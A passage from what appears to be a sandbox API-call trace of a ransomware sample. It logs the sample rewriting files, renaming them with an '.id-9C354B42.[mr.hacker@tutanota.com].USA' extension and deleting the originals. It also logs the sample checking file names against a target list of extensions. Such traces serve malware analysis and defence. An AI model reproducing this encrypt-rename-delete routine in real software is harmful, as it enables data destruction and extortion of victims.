(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf")) returned 0x20 [0273.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0274.323] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.323] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0274.323] GetLastError () returned 0x0 [0274.323] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x11dfe, lpOverlapped=0x0) returned 1 [0274.358] WriteFile (in: hFile=0x2b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x11e00, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.359] WriteFile (in: hFile=0x2b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.360] SetEndOfFile (hFile=0x2b0) returned 1 [0274.360] CloseHandle (hObject=0x2b0) returned 1 [0274.360] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.360] SetEndOfFile (hFile=0x2bc) returned 1 [0274.362] CloseHandle (hObject=0x2bc) returned 1 [0274.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf")) returned 1 [0274.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.422] lstrlenW (lpString=".doc") returned 4 [0274.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.422] lstrlenW (lpString=".docx") returned 5 [0274.422] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0274.422] lstrlenW (lpString=".pdf") returned 4 [0274.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.422] lstrlenW (lpString=".xls") returned 4 [0274.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.422] lstrlenW (lpString=".xlsx") returned 5 [0274.422] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0274.422] lstrlenW (lpString=".ppt") returned 4 [0274.422] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.422] lstrlenW (lpString=".zip") returned 4 [0274.422] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.422] lstrlenW (lpString=".rar") returned 4 [0274.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.422] lstrlenW (lpString=".bz2") returned 4 [0274.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.422] lstrlenW (lpString=".7z") returned 3 [0274.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.423] lstrlenW (lpString=".dbf") returned 4 [0274.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.423] lstrlenW (lpString=".1cd") returned 4 [0274.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 63 [0274.423] lstrlenW (lpString=".jpg") returned 4 [0274.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 60 os_tid = 0x680 [0263.607] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x34d0050 [0263.607] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x34e0058 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3560 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b37f8 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3578 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3bd0020 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3590 [0263.608] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3590, Size=0x20) returned 0x607b48 [0263.608] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3590 [0263.608] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3590, Size=0x20) returned 0x607b70 [0263.608] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.608] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.608] Wow64DisableWow64FsRedirection (in: OldValue=0x2fbff58 | out: OldValue=0x2fbff58*=0x0) returned 1 [0263.608] lstrlenW (lpString="kernel32.dll") returned 12 [0263.608] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607b48 | out: hHeap=0x520000) returned 1 [0263.608] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.608] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607b70 | out: hHeap=0x520000) returned 1 [0263.609] Sleep (dwMilliseconds=0x64) [0263.748] Sleep (dwMilliseconds=0x64) [0263.983] Sleep (dwMilliseconds=0x64) [0264.217] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.218] lstrlenW (lpString="split.avi") returned 9 [0264.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.311] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=194048) returned 1 [0264.311] CloseHandle (hObject=0x344) returned 1 [0264.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0264.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.311] lstrlenW (lpString=".doc") returned 4 [0264.311] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.311] lstrlenW (lpString=".docx") returned 5 [0264.311] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0264.312] lstrlenW (lpString=".pdf") returned 4 [0264.312] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".xls") returned 4 [0264.312] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".xlsx") returned 5 [0264.312] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0264.312] lstrlenW (lpString=".ppt") returned 4 [0264.312] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString=".zip") returned 4 [0264.312] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".rar") returned 4 [0264.312] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".bz2") returned 4 [0264.312] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".7z") returned 3 [0264.312] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString=".dbf") returned 4 [0264.312] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString=".1cd") returned 4 [0264.312] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString=".jpg") returned 4 [0264.312] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.312] lstrlenW (lpString=".doc") returned 4 [0264.312] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.312] lstrlenW (lpString=".docx") returned 5 [0264.312] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0264.313] lstrlenW (lpString=".pdf") returned 4 [0264.313] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString=".xls") returned 4 [0264.313] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString=".xlsx") returned 5 [0264.313] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0264.313] lstrlenW (lpString=".ppt") returned 4 [0264.313] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.313] lstrlenW (lpString=".zip") returned 4 [0264.313] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString=".rar") returned 4 [0264.313] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString=".bz2") returned 4 [0264.313] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString=".7z") returned 3 [0264.313] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.313] lstrlenW (lpString=".dbf") returned 4 [0264.313] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.313] lstrlenW (lpString=".1cd") returned 4 [0264.313] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0264.313] lstrlenW (lpString=".jpg") returned 4 [0264.313] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.313] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.314] lstrlenW (lpString="auxbase.xml") returned 11 [0264.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0264.529] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1434) returned 1 [0264.529] CloseHandle (hObject=0x378) returned 1 [0264.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0264.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.529] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.529] lstrlenW (lpString=".doc") returned 4 [0264.529] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString=".docx") returned 5 [0264.529] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0264.529] lstrlenW (lpString=".pdf") returned 4 [0264.529] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString=".xls") returned 4 [0264.529] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString=".xlsx") returned 5 [0264.529] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0264.529] lstrlenW (lpString=".ppt") returned 4 [0264.529] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.529] lstrlenW (lpString=".zip") returned 4 [0264.529] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.529] lstrlenW (lpString=".rar") returned 4 [0264.529] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString=".bz2") returned 4 [0264.529] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.529] lstrlenW (lpString=".7z") returned 3 [0264.530] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString=".dbf") returned 4 [0264.530] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString=".1cd") returned 4 [0264.530] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString=".jpg") returned 4 [0264.530] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString=".doc") returned 4 [0264.530] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString=".docx") returned 5 [0264.530] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0264.530] lstrlenW (lpString=".pdf") returned 4 [0264.530] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString=".xls") returned 4 [0264.530] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString=".xlsx") returned 5 [0264.530] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0264.530] lstrlenW (lpString=".ppt") returned 4 [0264.530] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.530] lstrlenW (lpString=".zip") returned 4 [0264.530] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.530] lstrlenW (lpString=".rar") returned 4 [0264.530] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.530] lstrlenW (lpString=".bz2") returned 4 [0264.531] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.531] lstrlenW (lpString=".7z") returned 3 [0264.531] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.531] lstrlenW (lpString=".dbf") returned 4 [0264.531] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.531] lstrlenW (lpString=".1cd") returned 4 [0264.531] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0264.531] lstrlenW (lpString=".jpg") returned 4 [0264.531] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.531] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.531] lstrlenW (lpString="kor-kor.xml") returned 11 [0264.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0264.675] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=392) returned 1 [0264.684] CloseHandle (hObject=0x37c) returned 1 [0264.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0264.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.716] lstrlenW (lpString=".doc") returned 4 [0264.716] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.716] lstrlenW (lpString=".docx") returned 5 [0264.716] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0264.716] lstrlenW (lpString=".pdf") returned 4 [0264.717] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString=".xls") returned 4 [0264.717] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString=".xlsx") returned 5 [0264.717] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0264.717] lstrlenW (lpString=".ppt") returned 4 [0264.717] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.717] lstrlenW (lpString=".zip") returned 4 [0264.717] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.717] lstrlenW (lpString=".rar") returned 4 [0264.717] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString=".bz2") returned 4 [0264.717] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString=".7z") returned 3 [0264.717] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.717] lstrlenW (lpString=".dbf") returned 4 [0264.717] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.717] lstrlenW (lpString=".1cd") returned 4 [0264.717] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.717] lstrlenW (lpString=".jpg") returned 4 [0264.717] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString=".doc") returned 4 [0264.718] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString=".docx") returned 5 [0264.718] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0264.718] lstrlenW (lpString=".pdf") returned 4 [0264.718] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString=".xls") returned 4 [0264.718] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString=".xlsx") returned 5 [0264.718] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0264.718] lstrlenW (lpString=".ppt") returned 4 [0264.718] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString=".zip") returned 4 [0264.718] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.718] lstrlenW (lpString=".rar") returned 4 [0264.718] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString=".bz2") returned 4 [0264.718] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString=".7z") returned 3 [0264.718] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString=".dbf") returned 4 [0264.718] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString=".1cd") returned 4 [0264.718] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0264.718] lstrlenW (lpString=".jpg") returned 4 [0264.719] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.719] Sleep (dwMilliseconds=0x64) [0264.919] Sleep (dwMilliseconds=0x64) [0265.133] lstrcmpiW (lpString1=".inc", lpString2=".USA") returned -1 [0265.133] lstrlenW (lpString="adovbs.inc") returned 10 [0265.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0265.138] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=14951) returned 1 [0265.138] CloseHandle (hObject=0x2b4) returned 1 [0265.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 